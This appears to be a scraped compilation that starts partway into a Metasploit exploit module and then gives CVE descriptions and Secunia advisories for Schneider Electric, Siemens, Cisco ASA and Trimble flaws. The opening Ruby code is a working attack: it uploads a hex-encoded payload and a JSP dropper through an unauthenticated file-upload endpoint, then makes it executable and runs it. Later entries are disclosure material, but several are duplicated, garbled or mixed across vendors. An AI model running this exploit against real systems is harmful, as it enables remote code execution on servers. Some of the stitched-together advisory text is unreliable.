Rex::Text.rand_text_alpha(rand(8)+8) var_data = Rex::Text.rand_text_alpha(rand(8)+8) var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) var_counter = Rex::Text.rand_text_alpha(rand(8)+8) var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) var_comb = Rex::Text.rand_text_alpha(rand(8)+8) var_exe = Rex::Text.rand_text_alpha(rand(8)+8) @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) var_proc = Rex::Text.rand_text_alpha(rand(8)+8) var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) jspraw = "<%@ page import=\"java.io.*\" %>\n" jspraw << "<%\n" jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" jspraw << "String #{var_data} = \"\";\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" jspraw << "}\n" jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" jspraw << "#{var_inputstream}.close();\n" jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" jspraw << "{\n" jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" jspraw << "#{var_comb} <<= 4;\n" jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" jspraw << "}\n" jspraw << "#{var_outputstream}.write(#{var_bytes});\n" jspraw << "#{var_outputstream}.close();\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" jspraw << "String[] #{var_fperm} = new String[3];\n" jspraw << "#{var_fperm}[0] = \"chmod\";\n" jspraw << "#{var_fperm}[1] = \"+x\";\n" jspraw << "#{var_fperm}[2] = #{var_exepath};\n" jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" jspraw << "if (#{var_proc}.waitFor() == 0) {\n" jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" # Linux and other UNICES allow removing files while they are in use... jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" jspraw << "} else {\n" # Windows does not .. jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" jspraw << "%>\n" return jspraw end def get_install_path res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'connection' => 'TE, close', 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'vars_post' => { 'num' => '123456', 'action' => 'show_diagnostics', 'task' => 'search', 'item' => 'application_log', 'criteria' => '*.*', 'width' => '500' } }) if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ return $1 end return nil end def upload_file(location, filename, contents) post_data = Rex::MIME::Message.new post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'connection' => 'TE, close' }) if res and res.code == 200 and res.body.empty? return true else return false end end def check @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' if get_install_path.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' # Get Tomcat installation path print_status("#{@peer} - Retrieving Tomcat installation path...") install_path = get_install_path if install_path.nil? fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") end print_good("#{@peer} - Tomcat installed on #{install_path}") if target['Platform'] == "linux" @location = "#{install_path}webapps/appliance/" elsif target['Platform'] == "win" @location = "#{install_path}webapps\\appliance\\" end # Upload the JSP and the raw payload @jsp_name = rand_text_alphanumeric(8+rand(8)) jspraw = generate_jsp # Specify the payload in hex as an extra file.. payload_hex = payload.encoded_exe.unpack('H*')[0] print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") end print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@jsp_name}.jsp", jspraw) print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") end print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") res = send_request_cgi( { 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", 'method' => 'GET' }) if res and res.code != 200 print_warning("#{@peer} - Error triggering the payload") end register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") end end

The client in Schneider Electric Software Update (SESU) Utility 1.0.x and 1.1.x does not ensure that updates have a valid origin, which allows man-in-the-middle attackers to spoof updates, and consequently execute arbitrary code, by modifying the data stream on TCP port 80. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. The Schneider Electric software on the customer's PC uses the SESU service as the communication mechanism for the Schneider Electric Center Update Server, which can be used to receive software updates on a regular basis. The SESU client on the client PC does not check the authenticity of the source. By redirecting the message to port 80 of the unauthorized source, the attacker can execute arbitrary code on the system. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Multiple Products SESU Update Spoofing Vulnerability SECUNIA ADVISORY ID: SA51849 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51849/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51849 RELEASE DATE: 2013-01-17 DISCUSS ADVISORY: http://secunia.com/advisories/51849/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51849/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51849 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in multiple Schneider Electric products, which can be exploited by malicious people to conduct spoofing attacks. The vulnerability is caused due to the Schneider-Electric Software Update (SESU) utility insecurely validating new updates and can be exploited to e.g. spoof an update via Man-in-the-Middle (MitM) attacks. The vulnerability is reported in the following products and versions: * IDS version 1.0 * IDS version 2.0 * PowerSuite version 2.5 * Smart Widget Acti 9 version 1.0.0.0 * Smart Widget H8035 version 1.0.0.0 * Smart Widget H8036 version 1.0.0.0 * Smart Widget PM210 version 1.0.0.0 * Smart Widget PM710 version 1.0.0.0 * Smart Widget PM750 version 1.0.0.0 * SoMachine version 1.2.1 * Spacial.pro versions 1.0.0.x * SESU versions 1.0.x * SESU versions 1.1.x * Unity Pro version 5.0 * Unity Pro version 6.0 * Unity Pro version 6.1 * Unity Pro version 4.1 * Vijeo Designer versions 6.0.x * Vijeo Designer versions 6.1.0.x * Vijeo Designer versions 5.0.0.x * Vijeo Designer versions 5.1.0.x * Vijeo Designer Opti versions 6.0.x * Vijeo Designer Opti versions 5.1.0.x * Vijeo Designer Opti versions 5.0.0.x * Web Gate Client Files version 5.1.x SOLUTION: Update the SESU client to a fixed version. PROVIDED AND/OR DISCOVERED BY: The vendor credits Arthur Gervais. ORIGINAL ADVISORY: Schneider: http://download.schneider-electric.com/files?p_File_Id=29960974&p_File_Name=SEVD-2013-009-01.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-13-016-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Siemens SIMATIC is an automation software in a single engineering environment. The challenge-response protocol used by SIEMENS SIMATIC S7 PLC for online verification has security vulnerabilities that allow attackers in border networks to intercept TCP/IP communications and then obtain challenge-response data from files for password brute force hacking. Siemens SIMATIC S7 Programmable Logic Controllers (PLC) systems are prone to a password-disclosure vulnerability. Attackers can exploit this issue to obtain device password credentials. This may aid in further attacks

The FactoryCast service on the Schneider Electric Quantum 140NOE77111 and 140NWM10000, M340 BMXNOE0110x, and Premium TSXETY5103 PLC modules allows remote authenticated users to send Modbus messages, and consequently execute arbitrary code, by embedding these messages in SOAP HTTP POST requests. Schneider Electric Ethernetmokuai has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious actions, such as changing passwords, in the context of the target user. The following versions are affected by this vulnerability: Quantum: 140NOE77111 140NOE77101 140NWM10000 M340: BMXNOC0401 BMXNOE0100x BMXNOE011xx Premium: TSXETY4103 TSXETY5103 TSXWMY100. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. The mechanism sent to the PLC via the Modbus command does not require authentication, allowing the attacker to send these messages to perform stop operations, modify I/O data, and so on. Schneider Electric Products are prone to multiple security vulnerabilities. Successfully exploiting these issues allows remote attackers to execute arbitrary code or perform unauthorized actions in the context of the user's session; other attacks are also possible. Note: The denial-of-service vulnerability issue affecting Modicon M340 and the authentication-bypass issue affecting Maagelis XBT HMI were determined not to be vulnerabilities. The following Schneider Electric products are affected: BMX NOE 0110 Modicon M340. Schneider Electric software on customer PCs uses the SESU service as a communication mechanism to the Schneider Electric central update server, which can be used to receive software updates on a regular basis. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Ethernet Modules Cross-Site Request Forgery Vulnerability SECUNIA ADVISORY ID: SA52189 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52189/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52189 RELEASE DATE: 2013-02-14 DISCUSS ADVISORY: http://secunia.com/advisories/52189/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52189/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52189 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Ethernet Modules, which can be exploited by malicious people to conduct cross-site request forgery attacks. The vulnerability is caused due to the modules allowing users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change credentials when a logged-in administrator visits a specially crafted web page. Quantum: 140NOE77111 140NOE77101 140NWM10000 M340: BMXNOC0401 BMXNOE0100x BMXNOE011xx Premium: TSXETY4103 TSXETY5103 TSXWMY100 SOLUTION: No official solution is currently available. PROVIDED AND/OR DISCOVERED BY: The vendor credits Arthur Gervais. ORIGINAL ADVISORY: SEVD-2013-023-01: http://download.schneider-electric.com/files?L=en&p=&p_docId=&p_docId=&p_Reference=SEVD%202013-023-01&p_EnDocType=Technical%20paper&p_File_Id=36555639&p_File_Name=SEVD-2013-023-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site request forgery (CSRF) vulnerability on the Schneider Electric Quantum 140NOE77111, 140NOE77101, and 140NWM10000; M340 BMXNOC0401, BMXNOE0100x, and BMXNOE011xx; and Premium TSXETY4103, TSXETY5103, and TSXWMY100 PLC modules allows remote attackers to hijack the authentication of arbitrary users for requests that execute commands, as demonstrated by modifying HTTP credentials. The following versions are affected by this vulnerability: Quantum: 140NOE77111 140NOE77101 140NWM10000 M340: BMXNOC0401 BMXNOE0100x BMXNOE011xx Premium: TSXETY4103 TSXETY5103 TSXWMY100. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. Such as modifying the HTTP authentication credentials. Schneider Electric Products are prone to multiple security vulnerabilities. Successfully exploiting these issues allows remote attackers to execute arbitrary code or perform unauthorized actions in the context of the user's session; other attacks are also possible. Note: The denial-of-service vulnerability issue affecting Modicon M340 and the authentication-bypass issue affecting Maagelis XBT HMI were determined not to be vulnerabilities. The following Schneider Electric products are affected: BMX NOE 0110 Modicon M340. Schneider Electric software on customer PCs uses the SESU service as a communication mechanism to the Schneider Electric central update server, which can be used to receive software updates on a regular basis. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Ethernet Modules Cross-Site Request Forgery Vulnerability SECUNIA ADVISORY ID: SA52189 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52189/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52189 RELEASE DATE: 2013-02-14 DISCUSS ADVISORY: http://secunia.com/advisories/52189/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52189/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52189 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Ethernet Modules, which can be exploited by malicious people to conduct cross-site request forgery attacks. The vulnerability is caused due to the modules allowing users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change credentials when a logged-in administrator visits a specially crafted web page. Quantum: 140NOE77111 140NOE77101 140NWM10000 M340: BMXNOC0401 BMXNOE0100x BMXNOE011xx Premium: TSXETY4103 TSXETY5103 TSXWMY100 SOLUTION: No official solution is currently available. PROVIDED AND/OR DISCOVERED BY: The vendor credits Arthur Gervais. ORIGINAL ADVISORY: SEVD-2013-023-01: http://download.schneider-electric.com/files?L=en&p=&p_docId=&p_docId=&p_Reference=SEVD%202013-023-01&p_EnDocType=Technical%20paper&p_File_Id=36555639&p_File_Name=SEVD-2013-023-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco Adaptive Security Appliances (ASA) devices with firmware 8.x through 8.4(1) do not properly manage SSH sessions, which allows remote authenticated users to cause a denial of service (device crash) by establishing multiple sessions, aka Bug ID CSCtc59462. Successful exploits may allow an attacker to cause a crash, resulting in a denial-of-service condition. This issue is being tracked by Cisco bug ID CSCtc59462

Cisco Adaptive Security Appliance (ASA) software 8.7.1 and 8.7.1.1 for the Cisco ASA 1000V Cloud Firewall allows remote attackers to cause a denial of service (device reload) via a malformed H.225 H.323 IPv4 packet, aka Bug IDs CSCuc42812 and CSCuc88741. The problem is Bug ID CSCuc42812 and CSCuc88741 It is a problem.Malformed by a third party H.225 , H.323 ,and IPv4 Service disruption via packets (( Device reload ) There is a possibility of being put into a state. Successful exploits may allow an attacker to trigger a reload on the device. A sustained denial-of-service condition can also arise due to repeated attacks. This issue is being tracked by Cisco bug ID CSCuc42812. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability SECUNIA ADVISORY ID: SA51897 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51897/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51897 RELEASE DATE: 2013-01-16 DISCUSS ADVISORY: http://secunia.com/advisories/51897/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51897/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51897 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cisco ASA 1000V Cloud Firewall, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when inspecting H.323 packets and can be exploited to trigger a reload via a specially crafted packet sent through the device. Successful exploitation requires that H.323 inspection is enabled (enabled by default). The vulnerability is reported in versions 8.7.1 and 8.7.1.1. SOLUTION: Update to version 8.7.1.3. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Cisco: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130116-asa1000v OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in the Receiver Web User Interface on Trimble Infrastructure GNSS Series Receivers NetR3, NetR5, NetR8, and NetR9 before 4.70, and NetRS before 1.3-2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. The Trimble Infrastructure GNSS Series Receivers is a GPS satellite receiver. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Trimble NetRS Unspecified Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA51859 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51859/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51859 RELEASE DATE: 2013-01-16 DISCUSS ADVISORY: http://secunia.com/advisories/51859/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51859/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51859 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Deloitte has reported a vulnerability in Trimble NetRS, which can be exploited by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being returned to the user. The vulnerability is reported in firmware versions prior to 1.3-2. SOLUTION: Update to firmware version 1.3-2. PROVIDED AND/OR DISCOVERED BY: Fara Rustein, Deloitte. ORIGINAL ADVISORY: Trimble: http://trl.trimble.com/docushare/dsweb/Get/Document-636664/NetRS_1%203-2_RelNotes.pdf DTTAR-20130001: http://archives.neohapsis.com/archives/bugtraq/2013-01/0063.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------